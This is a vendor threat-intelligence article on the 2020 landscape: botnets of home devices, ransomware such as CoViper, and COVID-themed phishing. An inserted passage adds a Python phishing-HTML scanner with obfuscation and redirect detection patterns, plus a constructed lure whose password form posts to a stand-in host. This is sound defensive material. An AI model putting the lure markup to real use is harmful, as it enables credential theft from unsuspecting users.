From botnets to phishing: A discussion on the 2020 threat landscape



By Aamir Lakhani, Global Security Strategist and Lead Researcher for FortiGuard Labs.

An unforeseeable shift in network structures and attack strategies was dropped on the cybersecurity industry in 2020. As the COVID-19 pandemic continues to take its toll on organizations and individuals around the globe, we are now dealing with a threat landscape that’s become more intense, complex, and saturated than ever before. And many organizations are finding it challenging to allot sufficient resources towards managing and mitigating these growing and evolving threats, having already faced operational setbacks prompted by the sudden transition to a fully remote workplace.  

Considering the ever-evolving nature of today’s cyber threats, business leaders must continually familiarize themselves with up-to-date threat intelligence and invest in the resources necessary to protect what is now – and will remain indefinitely – a larger, more fluid attack surface. This time, the changes happening across the cyber threat landscape are more dramatic, and the risks due to recent network changes are greater than ever. This makes accurate and actionable threat intelligence even more crucial. The following threat summary highlights the cyber criminal community’s ability to adapt and take advantage of low-hanging fruit to achieve their goals.

Leveraging At-Home Technology as a Gateway to the Enterprise

In the past, security teams were primarily focused on protecting users from application and networking threats, and hardening connected resources safely tucked inside the network perimeter. But this is no longer the case. During the pandemic, there has been an exponential rise in IoT usage and a reliance on home networks and consumer grade devices, such as home routers and modems – something which cyber criminals were quick to take notice of. The surge in remote work has also focused considerable attention on the security of personal devices being used to connect to the corporate network, including smartphones, tablets, laptops, and PCs. For attackers, this shift has presented a unique opportunity to exploit these devices and gain a foothold in enterprise networks (or, at least, on the devices used to access those networks). Such devices are easily compromised, and researchers are seeing the formation of large botnets that can be used to launch DDoS attacks or distribute malware aimed at the enterprise.

Over time, cyber criminals have not only grown to understand technology better but also have access to more sophisticated resources than they had in the past, making the task of protecting distributed resources more challenging than ever. Through the use of AI and machine learning tools, for example, cybercriminals are taking full advantage of the expanding attack surface and successfully bypassing traditional safeguards. Because of these advances in attack methods and technologies, IT teams are now struggling to stay ahead of things like updated ransomware and phishing threats that are being leveraged to compromise at-home IoT devices.

Ransomware Attacks Becoming More Sophisticated

Ransomware attacks have always been a significant concern for businesses. But over the past several months they’ve become more prevalent and costlier – both in terms of downtime and damages. Why has this threat not only persisted for so long, but recently become even more challenging? Because ransomware is even more readily available to attackers via DarkNet marketplaces. New ransomware technologies, including ransomware-as-a-service, are inexpensive and relatively simple to deploy.

Ransomware has been discovered hidden in messages, attachments, and documents related to COVID-19. And these threats continue to grow more sophisticated, helping cybercriminals to stay ahead of the curve. Three specific ransomware samples fell into this category: NetWalker, Ransomware-GVZ, and CoViper. Of the three, CoViper was especially concerning, having been found to rewrite the computer’s master boot record (MBR) before encrypting data. While our team has observed several attacks in the past where adversaries have used MBR wipers combined with ransomware to effectively cripple targeted PCs, this is an unusually aggressive strategy. 

Toward the end of the first half of the year, there were also several reports of potentially state-backed threat groups attacking organizations involved in COVID-19-related research in the U.S. and other countries. In addition, attackers have taken to moving critical data to public servers and threatening to release it publicly unless ransom demands are met – a way to circumvent the decision of victims to recover their systems themselves rather than give in to demands.

As these threats evolve, security teams must ensure they have access to real-time threat intelligence in order to stay up-to-date with the latest attack trends and methods. This includes keeping abreast of the tools being used by cyber criminals as a means of maximizing the impact of their attacks, including social media and Darknet search engines. And it also means modifying current strategies. Organizations are now advised to keep all data encrypted, whether in motion or at rest, to thwart recent attack strategies.

Phishing Evolves via Machine Learning

Many of the phishing attacks of the past have been unsophisticated and easily prevented, only posing a serious risk to the gullible. These scams generally employ social engineering tactics to steal credentials from unsuspecting users, often via email. In other cases, a compelling message is used to convince a victim to follow a link that installs malware or exposes sensitive data. 

But increasingly, these attacks are being used to set the stage for both on-premises and cloud service attacks. Recent phishing tactics are far more sophisticated and have evolved to target the weak links found at the edges of business networks. While employees at most organizations are now better educated about the dangers of email phishing, and take greater precautions when encountering a suspicious-looking link, hackers have begun to alter their approach. For example, cyber criminals are targeting unsecured home networks and novice teleworkers who lack essential cybersecurity training to steal personal information and launch attacks against the business networks to which they are connected. 

Many are also using machine learning to rapidly craft, test, and distribute messages with increasingly realistic visual content that triggers emotional distress in recipients. They can actually analyze different versions of attacks and modify their methods to ensure maximum effectiveness. Emerging phishing attacks include scams claiming to help targets deposit their stimulus checks, provide access to hard-to-find medical supplies or personal protective equipment, or offer helpdesk support for remote workers.

The majority of these phishing attacks contain malicious payloads – including ransomware, viruses, and remote access trojans (RATs) designed to provide criminals with remote access to endpoint systems, enabling them to perform remote desktop protocol (RDP) exploits. 

Our team also documented a significant spike in web-based phishing, beginning with the HTML/Phishing cyber threat family in January and February of 2020, a trend that held through the end of May. Similar HTML cousins – /ScrInject (browser script injection attacks) and /REDIR (browser redirection schemes) – have also contributed to the increase in phishing attempts this year. Web-based malware tends to evade or bypass most common antivirus programs, giving it a greater chance of survival and successful infection.
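As an added defensive illustration (not code from the original article or from FortiGuard Labs), the following Python scanner flags the kinds of indicators associated with the three HTML families just named: credential forms posting off-domain (HTML/Phishing), injected or obfuscated script (ScrInject), and meta-refresh or script-driven redirects (REDIR). The `trusted_domains` parameter and the sample attachment are constructed for the example.

```python
import re
from html.parser import HTMLParser

class HtmlPhishIndicators(HTMLParser):
    """Collect heuristic indicators from an HTML email attachment or landing page."""
    def __init__(self, trusted_domains):
        super().__init__()
        self.trusted = {d.lower() for d in trusted_domains}  # hosts we expect to see
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def _external(self, url):
        # True when the URL points at a host outside the trusted set
        m = re.match(r"^(?:https?:)?//([^/:?#]+)", url.strip(), re.I)
        return bool(m) and m.group(1).lower() not in self.trusted

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form" and self._external(a.get("action", "")):
            self.findings.append("form posts credentials off-domain: " + a["action"])
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh" \
                and "url=" in a.get("content", "").lower():
            self.findings.append("meta refresh redirect: " + a["content"])
        if tag == "script":
            self._in_script = True
            if self._external(a.get("src", "")):
                self.findings.append("script loaded from external host: " + a["src"])
        if tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append("password field present")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._script_buf)
            self._script_buf = []
            if re.search(r"(window|document)\.location|location\.(href|replace)", body):
                self.findings.append("script-driven redirect")
            if re.search(r"unescape\(|fromCharCode|atob\(|eval\(", body):
                self.findings.append("obfuscated/decoded script body")

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

def scan_html(html, trusted_domains=()):
    p = HtmlPhishIndicators(trusted_domains)
    p.feed(html)
    p.close()
    return p.findings

# Constructed sample resembling a credential-harvesting HTML attachment (not a real lure)
SAMPLE = """<html><head><meta http-equiv="refresh" content="5;url=http://example.invalid/login"></head>
<body><form action="http://example.invalid/post.php"><input type="password" name="pw"></form>
<script>var u=unescape("%68%74%74%70");window.location.href=u+"://example.invalid";</script></body></html>"""
```

Running `scan_html(SAMPLE)` yields five findings for the constructed sample, while a plain HTML page with no forms, scripts or redirects yields none.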

Security professionals should take note: The browser has been a key delivery vector for malware thus far in 2020, and this trend will likely continue into the next year. This corresponds to the documented drop in corporate web traffic, which was generally inspected and sanitized, and the rise in home-based web traffic due to the transition to a remote workforce strategy. This shift reinforces the point that cyber criminals have intentionally changed their attack methodologies by targeting the traffic that is now flooding lesser-secured networks. For this reason, organizations must not only provide remote workers with the knowledge and training necessary to secure their own personal networks and the connected business network, but also provide additional resources, such as new endpoint detection and response (EDR) solutions that can detect and stop advanced threats.

Looking Ahead of the Threat Landscape

The COVID-19 pandemic has reinforced what many industry professionals have recognized and championed for quite some time: That effective cybersecurity requires constant vigilance and the ability to adapt to changing threat strategies. While security should have been a top priority all along, now may be the time to consider investing in broader, more advanced, and more adaptable solutions – especially as cyber criminals modify their attack methods to leverage personal devices as a springboard to enterprise networks. With this in mind, shoring up remote systems and networks should make the top of the to-do list. 

Regardless of the state of the world around us, the best way to protect against ever-evolving malicious activity is to take a comprehensive, integrated approach to cybersecurity. A vital component of this is continuous access to up-to-date threat intelligence and cybersecurity training. Fortinet is committed to addressing this need by providing leading-edge insights into the cybersecurity threat landscape through our FortiGuard Labs global threat research team, advanced threat detection technologies, and in-depth reporting on advancing threat trends.
